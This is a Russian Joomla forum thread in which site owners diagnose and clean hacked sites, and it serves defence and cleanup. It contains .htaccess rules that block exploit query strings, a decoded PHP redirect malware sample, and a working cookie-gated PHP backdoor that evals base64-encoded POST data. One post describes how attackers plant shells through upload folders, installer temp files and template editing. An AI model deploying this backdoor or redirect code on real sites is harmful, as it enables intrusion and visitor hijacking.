Новости Joomla

Как тестировать Joomla PHP-разработчику? Компонент Patch tester.

👩‍💻 Как тестировать Joomla PHP-разработчику? Компонент Patch tester.Joomla - open source PHP-фреймворк с готовой админкой. Его основная разработка ведётся на GitHub. Для того, чтобы международному сообществу разработчиков было удобнее тестировать Pull Requests был создан компонент Patch Tester, который позволяет "накатить" на текущую установку Joomla именно те изменения, которые необходимо протестировать. На стороне инфраструктуры Joomla для каждого PR собираются готовые пакеты, в которых находится ядро + предложенные изменения. В каждом PR обычно находятся инструкции по тестированию: куда зайти, что нажать, ожидаемый результат. Тестировщики могут предположить дополнительные сценарии, исходя из своего опыта и найти баги, о которых сообщить разработчику. Или не найти, и тогда улучшение или исправление ошибки быстрее войдёт в ядро Joomla. Напомню, что для того, чтобы PR вошёл в ядро Joomla нужны минимум 2 положительных теста от 2 участников сообщества, кроме автора. Видео на YouTubeВидео на VK ВидеоВидео на RuTubeКомпонент на GitHub https://github.com/joomla-extensions/patchtester@joomlafeed#joomla #php #webdev #community

Вышел релиз Revo PageBuilder Toolkit for YOOtheme Pro 1.6

Вышел релиз Revo PageBuilder Toolkit for YOOtheme Pro 1.6.2PageBuilder Toolkit - это специализированный плагин для конструктора страниц Yootheme Pro, содержит набор различных утилит для ускорения процесса работы и отладки макета, множественные улучшения в интерфейсе, включая поддержку dark mode, подсказки, быстрая смена разрешения в окне просмотра и много чего еще.v.1.6.2 Что нового?- Индикатор статусов: теперь не просто показывает состояние запросов, но и делает автоматические попытки их отправки при кратковременных сбоях в сети, а если это не помогло, то переводит конструктор в ручной режим, что позволяет сохранит макет и настройки темы прежде чем вы потеряете все, что было сделано с момента последнего сохранения- Подсветка ошибок в макете: плагин анализирует код страницы и может автоматически подсвечивать data атрибуты с кучей мусора, которые попадают в код страницы при копипасте из Figma в TinyMCE (пригодится для старых макетов, в текущей работе плагин сам очищает код мусора). Также есть подсветка семантических ошибок сборки - дубли h1 тега на странице и вложенных друг в друга заголовков.- Улучшена поддержка будущего релиза Yootheme Pro 5 и редактора CodeMirror 6Плагин для русскоязычных пользователей доступен в каталоге расширений SovMart и распространяется за символическую плату (100р). Разработчики Joomla расширений и партнеры автора могут получить плагин бесплатно.Для работы плагина необходим конструктор страниц Yootheme Pro.Разработчик плагина - участник нашего сообщества Александр Судьбинов (@alexrevo), член официальной группы поддержки Yootheme Pro. Страница расширенияОписание на сайте автора@joomlafeed#joomla #yootheme

0 Пользователей и 1 Гость просматривают эту тему.
  • 792 Ответов
  • 292321 Просмотров
*

slava088

  • Захожу иногда
  • 79
  • 1 / 0
Код
AddType application/x-httpd-php5 .php

##
# @version $Id: htaccess.txt 14401 2010-01-26 14:10:00Z louis $
# @package Joomla
# @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
# @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
# Joomla! is Free Software
##

#####################################################
#  READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
#
# The line just below this section: 'Options +FollowSymLinks' may cause problems
# with some server configurations.  It is required for use of mod_rewrite, but may already
# be set by your server administrator in a way that dissallows changing it in
# your .htaccess file.  If using it causes your server to error out, comment it out (add # to
# beginning of line), reload your site in your browser and test your SEF url's.  If they work,
# it has been set by your server administrator and you do not need it set here.
#
#####################################################
php_value memory_limit "128M"
##  Can be commented out if causes errors, see notes above.
Options +FollowSymLinks

#
#  mod_rewrite in use

RewriteEngine On
RewriteCond %{HTTP_HOST} ^www.мой_сайт$ [NC]
RewriteRule ^(.*)$ http://мой_сайт/$1 [R=301,L]

########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
## Deny access to extension XML files (uncomment out to activate)
#<Files ~ "\.xml$">
#Order allow,deny
#Deny from all
#Satisfy all
#</Files>
## End of deny access to extension XML files
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits

#  Uncomment following line if your webserver's URL
#  is not directly related to physical file paths.
#  Update Your Joomla! Directory (just / for root)

# RewriteBase /

########## Begin - Joomla! core SEF Section
#
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/index.php
RewriteCond %{REQUEST_URI} (/|\.php|\.html|\.htm|\.feed|\.pdf|\.raw|/[^.]*)$  [NC]
RewriteRule (.*) index.php
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]
#
########## End - Joomla! core SEF Section

Мой .htaccess Хочу полностью разобраться, вроде ничего подозрительного нет.
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Мой .htaccess Хочу полностью разобраться, вроде ничего подозрительного нет.
Да, чистый.Тогда только искать редирект в файлах PHP.
*

slava088

  • Захожу иногда
  • 79
  • 1 / 0
Как прописывается редирект? Если 301 то тогда в ТК можем задать поиск по 301, если base64 не закодировано, то должны быть указаны ссылки, однако они тоже не находятся, каким спосбом еще может кодироваться код?
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Как прописывается редирект?если base64 не закодировано,
Кто сказал? плохо искал
А в самом шаблоне не встроена проверка на User-Agent ?
*

slava088

  • Захожу иногда
  • 79
  • 1 / 0
Скажите по каким запросам искать?
Как искать?
*

lord_sot

  • Осваиваюсь на форуме
  • 13
  • 0 / 0
У меня была проблема с тем что все сайты на хостинге заражались вирусом, делающим редирект с мобильных устройств. Все сайты были подчищены от вредоносного кода //Спасибо совету "поиск по слову base64_decode" // но периодически эта хрень снова возникает - спасают только восстановления из бэкапов. Все пароли были изменены, но эффекта 0. Вот со вчера на сегодня снова словил эту тему и вытащил access log. Может быть кто-нибудь сможет в нем увидеть как именно была произведено заражение?
Спойлер
[свернуть]
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Уфф, до этого справлялся теперь что то никак

вычистил кучу заразы, обновил, поправил .htaccess, выполнил рекомендации с форума и один фиг через если открывать через поиск яндекса, происходит редирект, если открывать напрямую то все нормально

****

Код
редирект идёт на http://ds-konzepte.info/libraries/pear/arch/pages/if.php

кто нибудь поборол аналогичную заразу?
Сегодня чистил сайт на заказ, там была зараза которая редиректила на этот сайт!
вот пример самой заразы в расшифрованном виде, которая редиректит:

Цитировать
error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){      
      header("Location: http://tinyurl.com/a4ak6x9");
      exit();
   }
}
}
Заразу победил! ^-^

P.S: аналезируя код на уязвимые моменты и вредоносность обнаружил что зараза была в одном установочном компаненте, который волялся в исходной папке перед установкой /tmp, архивом, разархевировав нашел протрояненые страници редиректом, пологаю что на источнике откуда были скачены компаненты, протроянены... всего лишь предположение...

для болие быстрого поиска криптованого кода использовал конструкцию для выполнения в консоле:
egrep -H "[поисковая фраза например eval]" `find . -type f -name "[в каких файлах искать, расширения, например :*.php]" -print`
« Последнее редактирование: 02.03.2013, 21:24:36 от flynstrool »
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Как прописывается редирект? Если 301 то тогда в ТК можем задать поиск по 301, если base64 не закодировано, то должны быть указаны ссылки, однако они тоже не находятся, каким спосбом еще может кодироваться код?
попробуй поискать "Location:"
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Как заливают shell:

Все просто нового ни чего не изобрели и не изобретут(хотя возможно но нет уверенности)
файл с shell заливается в основном в папки
Цитировать
images
images/stories
tmp

заливают либо сразу файл shell, либо "якобы картинку" файл с кодом и с расширением от изображения, который после загрузки либо остается таким же или ему меняют расширение, если он остается картинкой то тогда в этой директории появляется еще и файл .htaccesss для того чтоб этот файл работал

Что то не нашел в разделе того как все же это происходит, по каким пунктам шелл поподает все же в эти папки?
Хакер получивший каким либо путем админский доступ, при крива настроеных правах на сайте имеет возможность править конфиги, в результате чего можно дать разрешение медиа загрузчику для заливки шелла, корневая папка для загрузок в медиа идет с /images!
папка tmp!  в Joomla есть такой пункт установка модулей и компонентов, у нее есть два варианта загрузок, первый это с вашей машины на прямую, второй с сторонего сайта!, допустим если грузим со своей машиной, то джумал сначало закачивает в папку tmp и только потом начинает устанавливать его, но так как шелл не предназначен для установки как компонент, Joomla выплюнит вам ошибку, но приэтом шелл останется в папке tmp, вследствие чего мы уже имеем доступ!
вы еще не указали, что при кривых правах можно еще и шаблон править! в который можно вставить свой PHP код!
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
Цитировать
P.S: аналезируя код на уязвимые моменты и вредоносность обнаружил что зараза была в одном установочном компоненте, который волялся в исходной папке перед установкой /tmp, архивом, разархевировав нашел протрояненые страници редиректом, пологаю что на источнике откуда были скачены компоненты, протроянены... всего лишь предположение...

А по всему сайту зараза не могла прописаться?
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
А по всему сайту зараза не могла прописаться?
возможно все, но если по всему сайт то я так пологаю что скорее у вас утекли данный от ftp аккаунта, потом список таких аккаунтов зарежается впрограмку и програмка автоматом троянит все что можно протроянить, ну вообщем алгоритм не сложный!
*

slava088

  • Захожу иногда
  • 79
  • 1 / 0
Найден кусок кода отвечающий за вывод левых ссылок
Код
<?php $random_key = @yt_fashion15(); ?>
Я так понимаю просто удалением дело не обойдется, скажите алгоритм действия такого вируса?

По запросу base64_decode 57 файлов. Выходит все 57 файлов заражены или там могут быть рабочие файлы? Как их различить?
« Последнее редактирование: 03.03.2013, 09:26:06 от slava088 »
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу

По запросу base64_decode 57 файлов. Выходит все 57 файлов заражены или там могут быть рабочие файлы? Как их различить?
Сравнивать с такими файлами с дистра Joomla. Еще проще удалить все 57, а потом перезалить файлы Joomla.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Найден кусок кода отвечающий за вывод левых ссылок
Код
<?php $random_key = @yt_fashion15(); ?>
Я так понимаю просто удалением дело не обойдется, скажите алгоритм действия такого вируса?

По запросу base64_decode 57 файлов. Выходит все 57 файлов заражены или там могут быть рабочие файлы? Как их различить?
Насколько я знаю, Joomla не использует в своих файлах base64_decode, если лень просматривать каждый файл и разбираться с пречиной происходящего, то делай бэкап БД и переустонавливай все нахрен, но файлы шаблона все же тебе прийдется просмотреть, если шаблоны хочешь те жи оставить
*

Свят

  • Осваиваюсь на форуме
  • 44
  • 1 / 0
  • Не прыгаю за бабочками, они сами липнут ко мне...
на 3 странице данного топика - http://joomlaforum.ru/index.php/topic,246899.msg1272926.html#msg1272926 форумчане уже жаловались на эту проблему. Одним прекрасным солнечным зимним утром мною было обнаружено, что у сайта появилась вторая карта сайта, ведущая на 2500 других ресурсов или статей на самом же сайте - site.ru/?option=/cat/sitemap.html Проблема решилась довольно просто - были закачены файлы обновления Joomla 1.5 с 22 версии по 26 (хоть Joomla стояла и так последней версии). Дело в том, что как обычно - были замечены следы шела в папке картинок и изменён файл .htaccess  в этой же папке на закачку запрещённых форматов. Вроде всё подправил. Прошло два дня и вижу повторяющуюся картину - опять эта злополучная карта сайта, и перезаливка файлов уже не помогает.
Зашёл в логи, и вот, что увидел:
Код
173.199.115.99 - - [03/Mar/2013:04:35:45 +0400] "GET /component/mailto/?tmpl=component&link=aHR0cDovL25yYXZ5LW5hcm9kb3YucnUvYW1lcmlrYS9zZXZlcm5hamEtYW1lcmlrYS9zYWx2YWRvci5odG1s HTTP/1.1" 200 4684 "-" "Mozilla/5.0 (compatible; AhrefsBot/4.0; +http://ahrefs.com/robot/)"
173.199.115.99 - - [03/Mar/2013:04:36:31 +0400] "GET /component/mailto/?tmpl=component&link=aHR0cDovL25yYXZ5LW5hcm9kb3YucnUvZXZyYXppamEvZXZyb3BhL21vbGRvdmEuaHRtbA%3D%3D HTTP/1.1" 200 4672 "-" "Mozilla/5.0 (compatible; AhrefsBot/4.0; +http://ahrefs.com/robot/)"
173.199.115.99 - - [03/Mar/2013:04:36:43 +0400] "GET /?option=/cat/Rabota-menedzher-kafe.html HTTP/1.1" 200 62430 "-" "Mozilla/5.0 (compatible; AhrefsBot/4.0; +http://ahrefs.com/robot/)"

Заранее спасибо, за высказывание идей - как это всё можно исправить! ^-^
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
на 3 странице данного топика - http://joomlaforum.ru/index.php/topic,246899.msg1272926.html#msg1272926 форумчане уже жаловались на эту проблему. Одним прекрасным солнечным зимним утром мною было обнаружено, что у сайта появилась вторая карта сайта, ведущая на 2500 других ресурсов или статей на самом же сайте - site.ru/?option=/cat/sitemap.html Проблема решилась довольно просто - были закачены файлы обновления Joomla 1.5 с 22 версии по 26 (хоть Joomla стояла и так последней версии). Дело в том, что как обычно - были замечены следы шела в папке картинок и изменён файл .htaccess  в этой же папке на закачку запрещённых форматов. Вроде всё подправил. Прошло два дня и вижу повторяющуюся картину - опять эта злополучная карта сайта, и перезаливка файлов уже не помогает.
Зашёл в логи, и вот, что увидел:
Код
173.199.115.99 - - [03/Mar/2013:04:35:45 +0400] "GET /component/mailto/?tmpl=component&link=aHR0cDovL25yYXZ5LW5hcm9kb3YucnUvYW1lcmlrYS9zZXZlcm5hamEtYW1lcmlrYS9zYWx2YWRvci5odG1s HTTP/1.1" 200 4684 "-" "Mozilla/5.0 (compatible; AhrefsBot/4.0; +http://ahrefs.com/robot/)"
173.199.115.99 - - [03/Mar/2013:04:36:31 +0400] "GET /component/mailto/?tmpl=component&link=aHR0cDovL25yYXZ5LW5hcm9kb3YucnUvZXZyYXppamEvZXZyb3BhL21vbGRvdmEuaHRtbA%3D%3D HTTP/1.1" 200 4672 "-" "Mozilla/5.0 (compatible; AhrefsBot/4.0; +http://ahrefs.com/robot/)"
173.199.115.99 - - [03/Mar/2013:04:36:43 +0400] "GET /?option=/cat/Rabota-menedzher-kafe.html HTTP/1.1" 200 62430 "-" "Mozilla/5.0 (compatible; AhrefsBot/4.0; +http://ahrefs.com/robot/)"

Заранее спасибо, за высказывание идей - как это всё можно исправить! ^-^

в переменную link передался параметр равный в декодированом виде из базе64 "http://nravy-narodov.ru/amerika/severnaja-amerika/salvador.html"
во второй строчке передался такой урл: http://nravy-narodov.ru/evrazija/evropa/moldova.html

а вообще такая тактика действий очень похоже на прогоны!, это то что называется черным SEO!
Если это мешает вашему сайту, и вы не можите сами справится, то заказывайте чистку сайта!
*

Свят

  • Осваиваюсь на форуме
  • 44
  • 1 / 0
  • Не прыгаю за бабочками, они сами липнут ко мне...
в переменную link передался параметр равный в декодированом виде из базе64 "http://nravy-narodov.ru/amerika/severnaja-amerika/salvador.html"
во второй строчке передался такой урл: http://nravy-narodov.ru/evrazija/evropa/moldova.html

а вообще такая тактика действий очень похоже на прогоны!, это то что называется черным SEO!
Если это мешает вашему сайту, и вы не можите сами справится, то заказывайте чистку сайта!

winstrool, nravy-narodov.ru это и есть мой сайт:) вот и левая карта сайта - http://nravy-narodov.ru/?option=/cat/sitemap.html
Да вроде впервый раз получилось справиться, может и в этот раз что-нибудь придумается или подскажет кто.
*

klara7

  • Захожу иногда
  • 311
  • 4 / 1
У меня на сайте наплодились кучу однообразных файлов с разными названиями
1 файл:
Цитировать
<?php echo "#!!#";

2 файл
Цитировать
<?php
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@base64_decode(@str_replace(' ','',urldecode($_POST['msg']))))){
  echo '<textarea id=areatext>';
  eval($msg);
  echo '</textarea>bg';
  exit;
}}
?>

Кто-нибудь в курсе что они делают и как с этим безобразием бороться?
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
У меня на сайте наплодились кучу однообразных файлов с разными названиями
1 файл:
2 файл
Кто-нибудь в курсе что они делают и как с этим безобразием бороться?
Это шел! такую херь надо убивать!
*

klara7

  • Захожу иногда
  • 311
  • 4 / 1
Убиваю, но их уже просто туча. Проверяю fls.php. Он еще жалуется на
Спойлер
[свернуть]
Как узнать кто из них кто?
*

Свят

  • Осваиваюсь на форуме
  • 44
  • 1 / 0
  • Не прыгаю за бабочками, они сами липнут ко мне...
Убиваю, но их уже просто туча. Проверяю fls.php. Он еще жалуется на
Спойлер
[свернуть]
Как узнать кто из них кто?

На мой взгляд вот эти подозрительны:
Код
File: /home/сайт/public_html/images/stories/Shemi/5559e.php
String:: $_POST[

File: /home/сайт/public_html/images/stories/1.php
String:: $_POST[
Скачайте на комп, и посмотрите в нотпаде, что там такое, если не откроется файл, значит вирус.
Ещё в папке тмп у вас много чего лежит, но это нормально. Всё остальное на мой взгляд прекрасно. Вернитесь к предыдущему бекапу если делали их...
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
Когда "оно" прописалось уже неизвестно куда, особенно если php работает в режиме CGI, как на большинстве хостингов, т.е. Apache пишет куда хочет в любую папку с правами 755 и что хочет, то бесполезно уже искать. Тут надо восстанавливать рабочий бэкап, если таковой есть.
*

capricorn

  • Завсегдатай
  • 1949
  • 118 / 3
Причина заражения - 99% использование вареза.
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Убиваю, но их уже просто туча. Проверяю fls.php. Он еще жалуется на
Спойлер
[свернуть]
Как узнать кто из них кто?
а вы бы не могли показать содержимое файлов:

File: /home/сайт/public_html/tmp/install_4dc918bfa0f9c/ilvm_theme/images/flypage_themes/flypage_admirable/0dc26cba.php
String:: $_POST[

File: /home/сайт/public_html/tmp/install_4dc918bfa0f9c/ilvm_theme/images/administration/header/fa05a8a1df.php
String:: $_POST[

File: /home/сайт/public_html/tmp/install_4dc91853ae6ec/ilvm_theme/templates/product_details/2877b9c.php
String:: $_POST[
хотел бы просмотреть сигнатуру кода.
Их однозначно надо удолять!
и еще откуда вы устонавливали компоненты?
*

playtoppokerru

  • Осваиваюсь на форуме
  • 30
  • 0 / 0
Ау! никто не подскажет, это трояны или нет?
4.
<script language='javascript' type='text/javascript'> <!-- document.write( '</' ); document.write( 'span>' ); //--> </script>
5.
<script language='javascript' type='text/javascript'> <!-- document.write( '<span style=\'display: none;\'>' ); //--> </script>
9.
<script language='javascript' type='text/javascript'> <!-- var prefix = 'mailto:'; var suffix = ''; var attribs = ''; var path = 'href='; var addy99850 = 'support@'; addy99850 = addy99850 + 'trimori.com'; document.write( '<a ' + path + '\'' + prefix + addy99850 + suffix + '\'' + attribs + '>' ); document.write( addy99850 ); document.write( '<\/a>' ); //--> </script>
*

borada

  • Захожу иногда
  • 182
  • 13 / 0
А кто в курсе, проанализируйте код

Код
if ($lang == 'russian' || $lang == 'ukrainian' || $lang == 'belorussian' || $lang == 'ru-RU' || $lang == 'uk-UA' || $lang == 'be-BY') {
$tmpl->addGlobalVar('support', base64_decode('PGEgaHJlZj0iaHR0cDovL3d3dy5qb29tbGF0dW5lLnJ1IiB0aXRsZT0iSkNvbW1lbnRzIiB0YXJnZXQ9Il9ibGFuayI+SkNvbW1lbnRzPC9hPg=='));
} else {
$tmpl->addGlobalVar('support', base64_decode('PGEgaHJlZj0iaHR0cDovL3d3dy5qb29tbGF0dW5lLmNvbSIgdGl0bGU9IkpDb21tZW50cyIgdGFyZ2V0PSJfYmxhbmsiPkpDb21tZW50czwvYT4='));
}

У меня base64_decode('PG...    много в разных файлах
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
А кто в курсе, проанализируйте код
Этот норма, на разработчика.
playtoppokerru
метод document.write( , не вирус.А вот нижний код прописывает ссылку на отправку эмэйл support@trimori.com
klara7
удаляй все файлы с именем, рандомно состоящим из символом и цифр.Только в папке /cache , без фанатизма
*

borada

  • Захожу иногда
  • 182
  • 13 / 0
Этот норма, на разработчика.
playtoppokerru
метод document.write( , не вирус.А вот нижний код прописывает ссылку на отправку эмэйл support@trimori.com
klara7
удаляй все файлы с именем, рандомно состоящим из символом и цифр.Только в папке /cache , без фанатизма
Странная почта, учитывая что этот код в com_phoca...
Еще, по логу заметил, что первый раз прописывается файл типа a1b56a.php  в /components/com_jce/editor/extensions/links/joomlalinks/img

B PhocaGallery еще подозрительный код
Код
$tmpl['md'] = base64_decode('PGRpdiBzdHlsZT0idGV4dC1hbGlnbjogY2VudGVyOyBjb2xvcjojZDNkM2QzOyI+UG93ZXJlZCBieSA8YSBocmVmPSJodHRwOi8vd3d3LnBob2NhLmN6IiBzdHlsZT0idGV4dC1kZWNvcmF0aW9uOiBub25lOyIgdGFyZ2V0PSJfYmxhbmsiIHRpdGxlPSJQaG9jYS5jeiI+UGhvY2E8L2E+IDxhIGhyZWY9Imh0dHA6Ly93d3cucGhvY2EuY3ovcGhvY2FnYWxsZXJ5IiBzdHlsZT0idGV4dC1kZWNvcmF0aW9uOiBub25lOyIgdGFyZ2V0PSJfYmxhbmsiIHRpdGxlPSJQaG9jYSBHYWxsZXJ5Ij5HYWxsZXJ5PC9hPjwvZGl2Pg0K');
« Последнее редактирование: 05.03.2013, 09:19:54 от borada »
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
А прочитать сообщение прикрепленное как важное
Цитировать
(последние через что заливают это редактор JCE, менеджер расширений nonumber.nl, ну и старые не актуальные версии joomla)
Код- ссылка на разработчика PhocaGallery
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Редирект на спам ссылки. Как лчить?

Автор Евгений1980

Ответов: 2
Просмотров: 2520
Последний ответ 14.02.2024, 13:15:59
от wishlight
Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

Ответов: 110
Просмотров: 71451
Последний ответ 30.08.2023, 12:53:33
от SeBun
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 3501
Последний ответ 25.05.2023, 08:49:57
от Театрал
Re: Кажется вирус на сайте

Автор motokraft

Ответов: 24
Просмотров: 5114
Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
Хостинг пишет, что найден вирус в /media/com_media/js/media-manager-es5.js

Автор AlexP750

Ответов: 6
Просмотров: 3522
Последний ответ 22.02.2022, 11:38:15
от AlexP750